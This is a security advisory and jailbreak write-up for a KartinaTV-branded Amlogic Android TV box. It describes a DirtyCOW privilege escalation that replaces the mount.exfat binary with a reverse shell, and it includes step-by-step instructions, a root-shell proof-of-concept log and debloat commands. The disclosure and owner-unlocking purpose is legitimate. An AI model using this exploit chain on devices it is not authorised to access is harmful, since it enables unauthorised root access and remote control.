FDEU-CVE-2025-2ff0

Summary

Unpatched old vulnerabilities in KartinaTV firmware allow to jailbreak and debloat.

Tech details

KartinaTV firmware 4.2.2.186_SB522 is using an outdated kernel 3.10.33, which is vulnerable to DirtyCOW, allowing users to elevate privileges to root and bypass vendor lock. After jailbreaking the user can remove pre-installed bloatware and use the device as a generic Android tv box without a subscription.

About KartinaTV

KartinaTV is an IPTV provider in Germany that mostly targets Eastern Europe users, all streamed tv channels are in russian language. The stream can be watched on a dedicated branded Android tv box that is sold separately.

Device overview

FDEU-CVE-2025-2ff0-kartinatv-debloat-tvbox-photo.jpg

The device is a classic Android tv box based on a very popular low-cost quad-core CPU Amlogic S805-B (Meson8B) with 1GB RAM and 4GB of flash storage, ethernet port, 2xUSB and HDMI. The OEM is branded as Comigo and the model has codename Quattro. The model name on the PCB is labeled as GA-ALS3F2.

Upon booting, the device starts Android OS and a custom launcher that requires an internet connection and an active subscription in order to use the device. Which isn't fair. Anyone should have the right to unlock his device and use it without a subscription as a standalone media player or home server.

As usual, we got a device on the after-market for very cheap and got our hands dirty.

Serial console

FDEU-CVE-2025-2ff0-kartinatv-debloat-pcb.jpg

The PCB has a serial console port that needs to be soldered. No shell is available.

Snip of a boot log:

Starting kernel ...

[    0.000000@0] Booting Linux on physical CPU 0x200
[    0.000000@0] Initializing cgroup subsys cpu
[    0.000000@0] Initializing cgroup subsys cpuacct
[    0.000000@0] Linux version 3.10.33-ga2a8750 (jenkins@build01) (gcc version 4.7.3 20130205 (prerelease) (crosstool-NG linaro-1.13.1-4.7-2013.02-01-20130221 - Linaro GCC 2013.02) ) #309 SMP PREEMPT Wed Apr 11 22:20:44 IDT 2018
[    0.000000@0] CPU: ARMv7 Processor [410fc051] revision 1 (ARMv7), cr=10c5387d
[    0.000000@0] CPU: PIPT / VIPT nonaliasing data cache, VIPT aliasing instruction cache
[    0.000000@0] Machine: Amlogic Meson8B, model: AMLOGIC
[    0.000000@0] physical memory start address is 0x200000
..

DirtyCOW

To elevate privileges, we can use 3.10.33 kernel vulnerability named DirtyCOW, which, in a nut-shell, allows you to replace the contents of any file. The default way to exploit DirtyCOW is to replace the built-in Android binary run-as and then call it from an adb shell. But in this case adb is not available to the user as it is not possible to reach settings without first unlocking the launcher. However, we found that it is possible to install an APK app which would give at least access to a low privileged shell.

To hack this device we replaced the mount.exfat system binary with a simple reverse shell. To run the exploit all you need would be just to plug in a usb flash drive that is formatted as exFAT. This would execute mount.exfat binary as root with the highest selinux context.

Steps to hack:

  1. Compile the reverse shell payload as a.out.
  2. Download SimpleSSHD APK (get it from F-droid under the name "org.galexander.sshd").
  3. Write the APK to a FAT32 formatted USB flash drive.
  4. After plugging the USB flash drive, navigate to files from the welcome screen.
  5. Find the APK, install it and run from the final success screen.
  6. Connect to ssh, cd to "/data/local/tmp" and drop the exploit there.
  7. Execute the exploit and wait 10 seconds for it to finish.
  8. Plug exFAT USB flash drive.
  9. Run the built-in netcat to connect to the reverse shell and do your nasty things.

Exploit PoC

$ ssh 192.168.1.2 -p 2222
user@192.168.1.2's password:
~/data/org.galexander.sshd/files $ ./dirtycow a.out /system/bin/mount.exfat  --no-pad
dcow a.out /system/bin/mount.exfat
[*] size 9648
[*] mmap 0x400ef000
[*] currently 0x400ef000=464c457f
[*] using /proc/self/mem method
[*] check thread starts, address 0x400ef000, size 9648
[*] madvise thread starts, address 0x400ef000, size 9648
[*] check thread stops, patch successful, iterations 1[*] madvise thread stops, return code sum 0, iterations 39139
[*] /proc/self/mem 7438608 771
[*] finished pid=0 sees 0x400ef000=464c457f

~/data/org.galexander.sshd/files $ busybox nc -l -p 9999
id
uid=0(root) gid=0(root) context=u:r:init:s0
uname -a
Linux localhost 3.10.33-ga2a8750 #309 SMP PREEMPT Wed Apr 11 22:20:44 IDT 2018 armv7l GNU/Linux

Debloat

To remove the bloatware use this commands in the root shell:

pm disable com.comigo.cloud
pm disable ru.start.kartinatv
pm disable com.comigo.kartina.kiosk
pm disable com.comigo.rootkeeper
pm disable com.comigo.welcome
pm disable com.comigo.remoteshellconnector
pm disable com.comigo.cloud.res
pm disable com.comigo.welcome
pm disable com.comigo.tr069client
pm disable com.comigo.applicationupdater
pm disable com.comigo.upgrader
pm disable com.comigo.tv
pm disable com.comigo.payment.stb
pm disable com.comigo.operator.stb

After that, reboot and you should be able to install a launcher app and use the tv box as a standard Android device.

Timeline

2025-11-01 - initial research
2025-12-12 - full disclosure